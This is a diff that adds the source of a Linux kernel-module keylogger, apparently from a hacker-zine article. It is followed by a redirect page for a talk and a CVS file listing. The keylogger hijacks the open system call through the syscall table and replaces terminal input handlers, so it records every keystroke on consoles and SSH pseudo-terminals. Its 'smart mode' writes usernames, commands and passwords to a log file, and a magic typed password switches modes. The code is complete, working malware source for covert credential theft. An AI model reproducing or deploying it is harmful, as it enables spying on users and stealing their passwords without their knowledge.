+#define WRITABLE(f) (f->f_op && f->f_op->write)
+
+int write_to_file(char *logfile, char *buf, int size)
+{
+	int ret = 0;
+	struct file   *f = NULL;
+
+	lock_kernel();
+	BEGIN_KMEM;
+	f = filp_open(logfile, O_CREAT|O_APPEND, 00600);
+
+	if (IS_ERR(f)) {
+		DPRINT("Error %ld opening %s\n", -PTR_ERR(f), logfile);
+		ret = -1;
+	} else {
+		if (WRITABLE(f))
+			_write(f, buf, size);
+		else {
+	      		DPRINT("%s does not have a write method\n",
+	      			logfile);
+			ret = -1;
+		}
+    			
+		if ((ret = filp_close(f,NULL)))
+			DPRINT("Error %d closing %s\n", -ret, logfile);
+	}
+	END_KMEM;
+	unlock_kernel();
+
+	return ret;
+}
+
+
+#define BEGIN_ROOT { int saved_fsuid = current->fsuid; current->fsuid = 0;
+#define END_ROOT current->fsuid = saved_fsuid; }
+
+
+/* 
+ *  Logging keystrokes
+ */
+
+void logging(struct tty_struct *tty, struct tlogger *tmp, int cont) 
+{
+	int i;
+
+	char logfile[256];
+	char loginfo[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ + 256];
+	char date_time[24];
+	struct task_struct *task;
+
+	if (vlogger_mode == VK_NORMAL)
+		return;
+
+	if ((vlogger_mode == VK_SMARTMODE) && (!tmp->lastpos || cont))
+		return;
+		
+	task = get_task(tty->pgrp);
+		
+	for (i=0; i<tmp->lastpos; i++)
+		if (tmp->buf[i] == 0x0D) tmp->buf[i] = 0x0A;
+
+	if (!cont) 
+		tmp->buf[tmp->lastpos++] = 0x0A;
+	
+	tmp->buf[tmp->lastpos] = 0;
+
+	if (vlogger_mode == VK_DUMBMODE) {
+		snprintf(logfile, sizeof(logfile)-1, "%s/%s%d",
+				LOG_DIR, TTY_NAME(tty),	TTY_NUMBER(tty));
+		BEGIN_ROOT
+		if (!tmp->status) {
+			get_time(date_time);
+			if (task)
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"<%s uid=%d %s> %s", date_time,
+					task->uid, task->comm, tmp->buf);
+			else
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"<%s> %s", date_time, tmp->buf);
+			
+			write_to_file(logfile, loginfo, strlen(loginfo));
+		} else {
+			write_to_file(logfile, tmp->buf, tmp->lastpos);
+		}
+		END_ROOT
+
+#ifdef DEBUG
+		if (task)
+			DPRINT("%s/%d uid=%d %s: %s", 
+				TTY_NAME(tty), TTY_NUMBER(tty), 
+				task->uid, task->comm, tmp->buf);
+		else
+			DPRINT("%s", tmp->buf);
+#endif
+		tmp->status = cont;
+		
+	} else {
+
+		/*
+		 *  Logging USER/CMD and PASS in SMART_MODE
+		 */
+
+		BEGIN_ROOT
+		if (!tmp->pass) {
+			get_time(date_time);
+			if (task)
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"\n[%s tty=%s/%d uid=%d %s]\n"
+					"USER/CMD %s", date_time, 
+					TTY_NAME(tty),TTY_NUMBER(tty), 
+					task->uid, task->comm, tmp->buf);
+			else
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"\n[%s tty=%s/%d]\nUSER/CMD %s",
+					date_time, TTY_NAME(tty), 
+					TTY_NUMBER(tty), tmp->buf);
+
+			write_to_file(PASS_LOG, loginfo, strlen(loginfo));
+		} else {
+			snprintf(loginfo, sizeof(loginfo)-1, "PASS %s",
+					tmp->buf);
+			write_to_file (PASS_LOG, loginfo, strlen(loginfo));
+		}
+
+		END_ROOT
+
+#ifdef DEBUG
+		if (!tmp->pass)
+			DPRINT("USER/CMD %s", tmp->buf);
+		else
+			DPRINT("PASS %s", tmp->buf);
+#endif
+	}
+
+	if (!cont) tmp->buf[--tmp->lastpos] = 0;
+}
+
+
+#define resetbuf(t)		\
+{				\
+	t->buf[0] = 0;		\
+	t->lastpos = 0;		\
+}
+
+#define append_c(t, s, n)	\
+{				\
+	t->lastpos += n;	\
+	strncat(t->buf, s, n);	\
+}
+
+static inline void reset_all_buf(void)
+{
+	int i = 0;
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++)
+		if (ttys[i] != NULL)
+			resetbuf(ttys[i]);
+}
+
+void special_key(struct tlogger *tmp, const unsigned char *cp, int count)
+{
+    	switch(count) {
+	    case 2:
+    	    	switch(cp[1]) {
+			case '\'':
+				append_c(tmp, "[ALT-\']", 7);
+				break;
+			case ',':
+				append_c(tmp, "[ALT-,]", 7);
+				break;
+			case '-':
+				append_c(tmp, "[ALT--]", 7);
+				break;
+			case '.':
+				append_c(tmp, "[ALT-.]", 7);
+				break;
+			case '/':
+				append_c(tmp, "[ALT-/]", 7);
+				break;
+			case '0':
+				append_c(tmp, "[ALT-0]", 7);
+				break;
+			case '1':
+				append_c(tmp, "[ALT-1]", 7);
+				break;
+			case '2':
+				append_c(tmp, "[ALT-2]", 7);
+				break;
+			case '3':
+				append_c(tmp, "[ALT-3]", 7);
+				break;
+			case '4':
+				append_c(tmp, "[ALT-4]", 7);
+				break;
+			case '5':
+				append_c(tmp, "[ALT-5]", 7);
+				break;
+			case '6':
+				append_c(tmp, "[ALT-6]", 7);
+				break;
+			case '7':
+				append_c(tmp, "[ALT-7]", 7);
+				break;
+			case '8':
+				append_c(tmp, "[ALT-8]", 7);
+				break;
+			case '9':
+				append_c(tmp, "[ALT-9]", 7);
+				break;
+			case ';':
+				append_c(tmp, "[ALT-;]", 7);
+				break;
+			case '=':
+				append_c(tmp, "[ALT-=]", 7);
+				break;
+			case '[':
+				append_c(tmp, "[ALT-[]", 7);
+				break;
+			case '\\':
+				append_c(tmp, "[ALT-\\]", 7);
+				break;
+			case ']':
+				append_c(tmp, "[ALT-]]", 7);
+				break;
+			case '`':
+				append_c(tmp, "[ALT-`]", 7);
+				break;
+			case 'a':
+				append_c(tmp, "[ALT-A]", 7);
+				break;
+			case 'b':
+				append_c(tmp, "[ALT-B]", 7);
+				break;
+			case 'c':
+				append_c(tmp, "[ALT-C]", 7);
+				break;
+			case 'd':
+				append_c(tmp, "[ALT-D]", 7);
+				break;
+			case 'e':
+				append_c(tmp, "[ALT-E]", 7);
+				break;
+			case 'f':
+				append_c(tmp, "[ALT-F]", 7);
+				break;
+			case 'g':
+				append_c(tmp, "[ALT-G]", 7);
+				break;
+			case 'h':
+				append_c(tmp, "[ALT-H]", 7);
+				break;
+			case 'i':
+				append_c(tmp, "[ALT-I]", 7);
+				break;
+			case 'j':
+				append_c(tmp, "[ALT-J]", 7);
+				break;
+			case 'k':
+				append_c(tmp, "[ALT-K]", 7);
+				break;
+			case 'l':
+				append_c(tmp, "[ALT-L]", 7);
+				break;
+			case 'm':
+				append_c(tmp, "[ALT-M]", 7);
+				break;
+			case 'n':
+				append_c(tmp, "[ALT-N]", 7);
+				break;
+			case 'o':
+				append_c(tmp, "[ALT-O]", 7);
+				break;
+			case 'p':
+				append_c(tmp, "[ALT-P]", 7);
+				break;
+			case 'q':
+				append_c(tmp, "[ALT-Q]", 7);
+				break;
+			case 'r':
+				append_c(tmp, "[ALT-R]", 7);
+				break;
+			case 's':
+				append_c(tmp, "[ALT-S]", 7);
+				break;
+			case 't':
+				append_c(tmp, "[ALT-T]", 7);
+				break;
+			case 'u':
+				append_c(tmp, "[ALT-U]", 7);
+				break;
+			case 'v':
+				append_c(tmp, "[ALT-V]", 7);
+				break;
+			case 'x':
+				append_c(tmp, "[ALT-X]", 7);
+				break;
+			case 'y':
+				append_c(tmp, "[ALT-Y]", 7);
+				break;
+			case 'z':
+				append_c(tmp, "[ALT-Z]", 7);
+				break;
+		}
+		break;
+	    case 3:
+		switch(cp[2]) {
+			case 68:
+				// Left: 27 91 68
+				append_c(tmp, "[LEFT]", 6);
+				break;
+			case 67:
+				// Right: 27 91 67
+				append_c(tmp, "[RIGHT]", 7);
+				break;
+			case 65:
+				// Up: 27 91 65
+				append_c(tmp, "[UP]", 4);
+				break;
+			case 66:
+				// Down: 27 91 66
+				append_c(tmp, "[DOWN]", 6);
+				break;
+			case 80:
+				// Pause/Break: 27 91 80 
+				append_c(tmp, "[BREAK]", 7);
+				break;
+		}
+		break;
+	    case 4:
+		switch(cp[3]) {
+			case 65:
+				// F1: 27 91 91 65
+				append_c(tmp, "[F1]", 4);
+				break;
+			case 66:
+				// F2: 27 91 91 66
+				append_c(tmp, "[F2]", 4);
+				break;
+			case 67:
+				// F3: 27 91 91 67
+				append_c(tmp, "[F3]", 4);
+				break;
+			case 68:
+				// F4: 27 91 91 68
+				append_c(tmp, "[F4]", 4);
+				break;
+			case 69:
+				// F5: 27 91 91 69
+				append_c(tmp, "[F5]", 4);
+				break;
+			case 126:
+				switch(cp[2]) {
+					case 53:
+						// PgUp: 27 91 53 126
+						append_c(tmp, "[PgUP]", 6);
+						break;
+					case 54:
+						// PgDown: 27 91 54 126
+						append_c(tmp, 
+							"[PgDOWN]", 8);
+						break;
+					case 49:
+						// Home: 27 91 49 126
+						append_c(tmp, "[HOME]", 6);
+						break;
+					case 52:
+						// End: 27 91 52 126
+						append_c(tmp, "[END]", 5);
+						break;
+					case 50:
+						// Insert: 27 91 50 126
+						append_c(tmp, "[INS]", 5);
+						break;
+					case 51:
+						// Delete: 27 91 51 126
+						append_c(tmp, "[DEL]", 5);
+						break;
+				}
+			break;
+		}
+		break;
+	    case 5:
+		if(cp[2] == 50)
+			switch(cp[3]) {
+				case 48:
+					// F9: 27 91 50 48 126
+					append_c(tmp, "[F9]", 4);
+					break;
+				case 49:
+					// F10: 27 91 50 49 126
+					append_c(tmp, "[F10]", 5);
+					break;
+				case 51:
+					// F11: 27 91 50 51 126
+					append_c(tmp, "[F11]", 5);
+					break;
+				case 52:
+					// F12: 27 91 50 52 126
+					append_c(tmp, "[F12]", 5);
+					break;
+				case 53:
+					// Shift-F1: 27 91 50 53 126
+					append_c(tmp, "[SH-F1]", 7);
+					break;
+				case 54:
+					// Shift-F2: 27 91 50 54 126
+					append_c(tmp, "[SH-F2]", 7);
+					break;
+				case 56:
+					// Shift-F3: 27 91 50 56 126
+					append_c(tmp, "[SH-F3]", 7);
+					break;
+				case 57:
+					// Shift-F4: 27 91 50 57 126
+					append_c(tmp, "[SH-F4]", 7);
+					break;
+			}
+		else
+			switch(cp[3]) {
+				case 55:
+					// F6: 27 91 49 55 126
+					append_c(tmp, "[F6]", 4);
+					break;
+		     		case 56:
+					// F7: 27 91 49 56 126
+					append_c(tmp, "[F7]", 4);
+					break;
+     				case 57:
+					// F8: 27 91 49 57 126
+					append_c(tmp, "[F8]", 4);
+					break;
+		     		case 49:
+					// Shift-F5: 27 91 51 49 126
+					append_c(tmp, "[SH-F5]", 7);
+					break;
+		     		case 50:
+					// Shift-F6: 27 91 51 50 126
+					append_c(tmp, "[SH-F6]", 7);
+					break;
+     				case 51:
+					// Shift-F7: 27 91 51 51 126
+					append_c(tmp, "[SH-F7]", 7);
+					break;
+		     		case 52:
+					// Shift-F8: 27 91 51 52 126
+					append_c(tmp, "[SH-F8]", 7);
+					break;
+			};
+		break;
+	    default:	// Unknow
+		break;
+    }
+}
+
+
+/* 
+ *  Called whenever user press a key
+ */
+
+void vlogger_process(struct tty_struct *tty, 
+			const unsigned char *cp, int count)
+{
+	struct tlogger *tmp = ttys[TTY_INDEX(tty)];
+
+	if (!tmp) {
+		DPRINT("erm .. unknow error???\n");
+		init_tty(tty, TTY_INDEX(tty));
+		tmp = ttys[TTY_INDEX(tty)];
+		if (!tmp)
+			return;
+	}
+
+	if (vlogger_mode == VK_SMARTMODE) {
+		if (tmp->status && !IS_PASSWD(tty)) {
+			resetbuf(tmp);
+		}		
+		if (!tmp->pass && IS_PASSWD(tty)) {
+			logging(tty, tmp, 0);
+			resetbuf(tmp);
+		}
+		if (tmp->pass && !IS_PASSWD(tty)) { 
+			if (!tmp->lastpos)
+				logging(tty, tmp, 0);
+			resetbuf(tmp);
+		}
+		tmp->pass  = IS_PASSWD(tty);
+		tmp->status = 0;
+	}
+
+	if ((count + tmp->lastpos) > MAX_BUFFER - 1) {	
+		logging(tty, tmp, 1);
+		resetbuf(tmp);
+	} 
+
+	if (count == 1) {
+		if (cp[0] == VK_TOGLE_CHAR) {
+			if (!strcmp(tmp->buf, MAGIC_PASS)) {
+				if(vlogger_mode < 2)
+					vlogger_mode++;
+				else
+					vlogger_mode = 0;
+				reset_all_buf();
+
+				switch(vlogger_mode) {
+					case VK_DUMBMODE:
+				    		DPRINT("Dumb Mode\n");
+						TTY_WRITE(tty, "\r\n"
+				    		"Dumb Mode\n", 12);
+						break;
+					case VK_SMARTMODE:
+				    		DPRINT("Smart Mode\n");
+						TTY_WRITE(tty, "\r\n"
+						"Smart Mode\n", 13);
+						break;
+					case VK_NORMAL:
+					    	DPRINT("Normal Mode\n");
+						TTY_WRITE(tty, "\r\n"
+						"Normal Mode\n", 14);
+				}
+			}
+		}
+
+		switch (cp[0]) {
+			case 0x01:	//^A
+				append_c(tmp, "[^A]", 4);
+				break;
+			case 0x02:	//^B
+				append_c(tmp, "[^B]", 4);
+				break;
+			case 0x03:	//^C
+				append_c(tmp, "[^C]", 4);
+			case 0x04:	//^D
+				append_c(tmp, "[^D]", 4);
+			case 0x0D:	//^M
+			case 0x0A:
+				if (vlogger_mode == VK_SMARTMODE) {
+					if (IS_PASSWD(tty)) {
+						logging(tty, tmp, 0);
+						resetbuf(tmp);
+					} else
+						tmp->status = 1;
+				} else {
+					logging(tty, tmp, 0);
+					resetbuf(tmp);
+				}
+				break;
+			case 0x05:	//^E
+				append_c(tmp, "[^E]", 4);
+				break;
+			case 0x06:	//^F
+				append_c(tmp, "[^F]", 4);
+				break;
+			case 0x07:	//^G
+				append_c(tmp, "[^G]", 4);
+				break;
+			case 0x09:	//TAB - ^I
+				append_c(tmp, "[TAB]", 5);
+				break;
+			case 0x0b:	//^K
+				append_c(tmp, "[^K]", 4);
+				break;
+			case 0x0c:	//^L
+				append_c(tmp, "[^L]", 4);
+				break;
+			case 0x0e:	//^E
+				append_c(tmp, "[^E]", 4);
+				break;
+			case 0x0f:	//^O
+				append_c(tmp, "[^O]", 4);
+				break;
+			case 0x10:	//^P
+				append_c(tmp, "[^P]", 4);
+				break;
+			case 0x11:	//^Q
+				append_c(tmp, "[^Q]", 4);
+				break;
+			case 0x12:	//^R
+				append_c(tmp, "[^R]", 4);
+				break;
+			case 0x13:	//^S
+				append_c(tmp, "[^S]", 4);
+				break;
+			case 0x14:	//^T
+				append_c(tmp, "[^T]", 4);
+				break;
+			case 0x15:	//CTRL-U
+				resetbuf(tmp);
+				break;				
+			case 0x16:	//^V
+				append_c(tmp, "[^V]", 4);
+				break;
+			case 0x17:	//^W
+				append_c(tmp, "[^W]", 4);
+				break;
+			case 0x18:	//^X
+				append_c(tmp, "[^X]", 4);
+				break;
+			case 0x19:	//^Y
+				append_c(tmp, "[^Y]", 4);
+				break;
+			case 0x1a:	//^Z
+				append_c(tmp, "[^Z]", 4);
+				break;
+			case 0x1c:	//^\
+				append_c(tmp, "[^\\]", 4);
+				break;
+			case 0x1d:	//^]
+				append_c(tmp, "[^]]", 4);
+				break;
+			case 0x1e:	//^^
+				append_c(tmp, "[^^]", 4);
+				break;
+			case 0x1f:	//^_
+				append_c(tmp, "[^_]", 4);
+				break;
+			case BACK_SPACE_CHAR1:
+			case BACK_SPACE_CHAR2:
+				if (!tmp->lastpos) break;
+				if (tmp->buf[tmp->lastpos-1] != ']')
+					tmp->buf[--tmp->lastpos] = 0;
+				else {
+					append_c(tmp, "[^H]", 4);
+				}
+				break;
+			case ESC_CHAR:	//ESC
+				append_c(tmp, "[ESC]", 5);
+				break;
+			default:
+				tmp->buf[tmp->lastpos++] = cp[0];
+				tmp->buf[tmp->lastpos] = 0;
+		}
+	} else {	// a block of chars or special key
+		if (cp[0] != ESC_CHAR) {
+			while (count >= MAX_BUFFER) {
+				append_c(tmp, cp, MAX_BUFFER);
+				logging(tty, tmp, 1);
+				resetbuf(tmp);
+				count -= MAX_BUFFER;
+				cp += MAX_BUFFER;
+			}
+
+			append_c(tmp, cp, count);
+		} else 	// special key
+			special_key(tmp, cp, count);
+	}
+}
+
+
+void my_tty_open(void) 
+{
+	int fd, i;
+	char dev_name[80];
+
+#ifdef LOCAL_ONLY
+	int fl = 0;
+	struct tty_struct * tty;
+	struct file * file;
+#endif
+
+	for (i=1; i<MAX_TTY_CON; i++) {
+		snprintf(dev_name, sizeof(dev_name)-1, "/dev/tty%d", i);
+
+		BEGIN_KMEM
+			fd = open(dev_name, O_RDONLY, 0);
+			if (fd < 0) continue;
+
+#ifdef LOCAL_ONLY
+			file = fget(fd);
+			tty = file->private_data;
+			if (tty != NULL  && 
+				tty->ldisc.receive_buf != NULL) {
+				if (!fl) {
+					old_receive_buf = 
+						tty->ldisc.receive_buf;
+					fl = 1;
+				}
+				init_tty(tty, TTY_INDEX(tty));
+			}
+			fput(file);
+#endif
+
+			close(fd);
+		END_KMEM
+	}
+
+#ifndef LOCAL_ONLY
+	for (i=0; i<MAX_PTS_CON; i++) {
+		snprintf(dev_name, sizeof(dev_name)-1, "/dev/pts/%d", i);
+
+		BEGIN_KMEM
+			fd = open(dev_name, O_RDONLY, 0);
+			if (fd >= 0) close(fd);
+		END_KMEM
+	}
+#endif
+
+}
+
+
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp,
+						char *fp, int count)
+{
+	if (!tty->real_raw && !tty->raw)	// ignore raw mode
+		vlogger_process(tty, cp, count);
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+static inline void init_tty(struct tty_struct *tty, int tty_index)
+{
+	struct tlogger *tmp;
+
+	DPRINT("Init logging for %s%d\n", TTY_NAME(tty), TTY_NUMBER(tty));
+
+	if (ttys[tty_index] == NULL) {
+		tmp = kmalloc(sizeof(struct tlogger), GFP_KERNEL);
+		if (!tmp) {
+			DPRINT("kmalloc failed!\n");
+			return;
+		}
+		memset(tmp, 0, sizeof(struct tlogger));
+		tmp->tty = tty;
+		tty->ldisc.receive_buf = new_receive_buf;
+		ttys[tty_index] = tmp;
+	} else {
+		tmp = ttys[tty_index];
+		logging(tty, tmp, 1);
+		resetbuf(tmp);
+		tty->ldisc.receive_buf = new_receive_buf;
+	}
+}
+
+
+asmlinkage int new_sys_open(const char *filename, int flags, int mode)
+{
+	int ret;
+	static int fl = 0;
+	struct file * file;
+	
+	ret = (*original_sys_open)(filename, flags, mode);
+	
+	if (ret >= 0) {
+		struct tty_struct * tty;
+
+	    BEGIN_KMEM
+	    	lock_kernel();
+		file = fget(ret);
+		tty = file->private_data;
+
+		if (tty != NULL && 
+			((tty->driver.type == TTY_DRIVER_TYPE_CONSOLE &&
+			TTY_NUMBER(tty) < MAX_TTY_CON - 1 ) ||
+			(tty->driver.type == TTY_DRIVER_TYPE_PTY &&
+			tty->driver.subtype == PTY_TYPE_SLAVE &&
+			TTY_NUMBER(tty) < MAX_PTS_CON)) &&
+			tty->ldisc.receive_buf != NULL &&
+			tty->ldisc.receive_buf != new_receive_buf) {
+
+			if (!fl) {
+				old_receive_buf = tty->ldisc.receive_buf;
+				fl = 1;
+			}
+			init_tty(tty, TTY_INDEX(tty));
+		}
+		fput(file);
+		unlock_kernel();
+	    END_KMEM
+	}
+	return ret;
+}
+
+
+int init_module(void)
+{
+
+	DPRINT(MVERSION);
+#ifndef LOCAL_ONLY
+	original_sys_open = sys_call_table[__NR_open];
+	sys_call_table[__NR_open] = new_sys_open;
+#endif
+	my_tty_open();
+//	MOD_INC_USE_COUNT;
+
+	return 0;
+}
+
+DECLARE_WAIT_QUEUE_HEAD(wq);
+
+void cleanup_module(void)
+{
+	int i;
+
+#ifndef LOCAL_ONLY
+	sys_call_table[__NR_open] = original_sys_open;
+#endif
+
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
+		if (ttys[i] != NULL) {
+			ttys[i]->tty->ldisc.receive_buf = old_receive_buf;
+		}
+	}
+	sleep_on_timeout(&wq, HZ);
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++) {
+		if (ttys[i] != NULL) {
+			kfree(ttys[i]);
+		}
+	}
+	DPRINT("Unloaded\n");
+}
+
+EXPORT_NO_SYMBOLS;
+<-->
+|=[ EOF ]=---------------------------------------------------------------=|

Presentations/ffp-talk.html

@@ -0,0 +1,33 @@
+<HTML>
+<HEAD>
+<META HTTP-EQUIV="Refresh" CONTENT="1;URL=ffp-talk/index.html"> 
+</HEAD>
+<BODY BGCOLOR="WHITE">
+<BR><BR><BR>
+<CENTER>
+Redirecting to the presentation slides<BR>
+<B>"Unscharfe kryptographische Fingerabdr&uuml;cke"</B>
+</CENTER>
+</BODY>
+</HTML>
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                          
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                    
+                                                                                                                                                                                                                                                                                                                                                                                                                                                                              
+                                                                                                                                                          

Presentations/ffp-talk/CVS/Entries

@@ -0,0 +1,146 @@
+/index.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00001.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00001.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00001.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00001.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00002.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00002.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00002.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00002.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00003.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00003.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00003.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00003.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00004.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00004.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00004.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00004.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00005.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00005.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00005.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00005.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00006.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00006.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00006.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00006.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00007.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00007.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00007.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00007.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00008.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00008.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00008.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00008.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00009.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00009.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00009.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00009.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00010.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00010.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00010.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00010.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00011.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00011.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00011.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00011.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00012.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00012.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00012.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00012.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00013.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00013.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00013.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00013.txt/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00014.html/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00014.idx.jpg/1.1/Thu Mar 11 12:50:58 2004//
+/mgp00014.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00014.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00015.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00015.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00015.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00015.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00016.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00016.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00016.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00016.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00017.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00017.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00017.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00017.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00018.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00018.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00018.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00018.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00019.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00019.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00019.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00019.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00020.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00020.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00020.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00020.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00021.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00021.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00021.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00021.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00022.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00022.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00022.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00022.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00023.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00023.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00023.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00023.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00024.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00024.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00024.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00024.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00025.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00025.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00025.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00025.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00026.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00026.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00026.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00026.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00027.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00027.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00027.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00027.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00028.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00028.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00028.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00028.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00029.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00029.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00029.jpg/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00029.txt/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00030.html/1.1/Thu Mar 11 12:50:59 2004//
+/mgp00030.idx.jpg/1.1/Thu Mar 11 12:50:59 2004//
